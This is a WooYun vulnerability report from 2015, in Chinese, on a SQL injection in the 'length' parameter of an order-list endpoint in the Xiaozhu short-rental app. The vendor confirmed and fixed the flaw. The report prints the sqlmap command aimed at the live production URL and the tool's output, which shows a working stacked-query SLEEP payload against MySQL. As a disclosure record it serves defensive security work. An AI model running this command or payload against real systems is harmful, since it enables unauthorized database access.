当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157146

漏洞标题:小猪短租APP某处SQL注入漏洞可执行多语句

相关厂商:xiaozhu.com

漏洞作者: 路人甲

提交时间:2015-11-30 19:35

修复时间:2015-12-02 16:17

公开时间:2015-12-02 16:17

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-02: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

小猪短租SQL注入

详细说明:

http://wireless.xiaozhu.com/app/xzfk/android/220/order/list?length=10&_=1447840135385&sessId=*********************&bizState=ongoing&offset=0&dispathChannel=xiaozhu&userId=***********
注入点length

漏洞证明:

➜  sqlmap-master git:(master) ✗ python sqlmap.py -u "http://wireless.xiaozhu.com/app/xzfk/android/220/order/list?length=1&_=1447840135385&sessId=*******************&bizState=ongoing&offset=0&dispathChannel=xiaozhu&userId=**********" -p length    
_
___ ___| |_____ ___ ___ {1.0-dev-721d052}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 18:34:55
[18:34:55] [INFO] resuming back-end DBMS 'mysql'
[18:34:55] [INFO] testing connection to the target URL
[18:34:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: length (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: length=1;(SELECT * FROM (SELECT(SLEEP(5)))BFKI)#&_=1447840135385&sessId=***********************&bizState=ongoing&offset=0&dispathChannel=xiaozhu&userId=***********
---
[18:34:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11

修复方案:

修改拼接字段

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-30 20:11

厂商回复:

感谢作者!

最新状态:

2015-12-02:已修复